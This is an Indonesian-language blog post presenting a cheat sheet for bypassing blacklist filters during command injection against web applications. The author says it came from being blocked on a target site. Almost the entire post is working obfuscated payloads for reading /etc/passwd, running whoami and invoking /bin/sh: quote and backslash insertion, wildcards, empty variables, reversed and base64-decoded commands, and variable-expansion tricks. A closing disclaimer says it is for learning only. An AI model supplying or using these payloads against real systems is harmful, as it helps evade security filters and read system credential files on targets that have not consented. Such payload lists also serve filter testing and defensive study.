Command Injection Bypass Cheatsheet
Command Injection Bypass Cheatsheet. Adakalanya saat kita melakukan command injection pada website atau aplikasi yang rentan command atau perintah yang kita kirim diblock karena mengandung kata yang sudah diblacklist. nah di tutorial ini saya akan sharing bagaimana caya membypass blacklist tersebut.
Command Injection Bypass Cheatsheet
Di contoh ini saya menggunakan perintah untuk melihat /etc/passwd .
Normal command :
cat etc/passwd
Nah di kasus yang saya alami, saya di block ketika ingin melakukan command injection pada web yang dihost di OVH.
Command with Quote
cat /etc/passwd
cat /'e'tc/pa's'swd
Wildcard
cat /etc/pa??wd
cat /etc/pa*wd
Null variable
cat /et``c/passw``d
cat /et$()c/pa$()sswd
cat /et${neko}c/pas${poi}swd
Reverse Encode command
`echo dwssap/cte/ tac | rev`
$(echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d)
Bypass with single quote
w'h'o'am'i
Bypass with double quote
whoami
Bypass with backslash and slash
w\ho\am\i
/\b\i\n/////s\h
Bypass with $@
who$@ami
Bypass with variable expansion
/???/??t /???/p??s??
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
Oke mungkin sekian sharing kali ini, jika ada yang ingin ditambahkan silahkan komentar.
Sumber http://noob1t4.blogspot.com/
Sekian Artikel Command Injection Bypass Cheatsheet.
Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini
0 Response to "Command Injection Bypass Cheatsheet"
Posting Komentar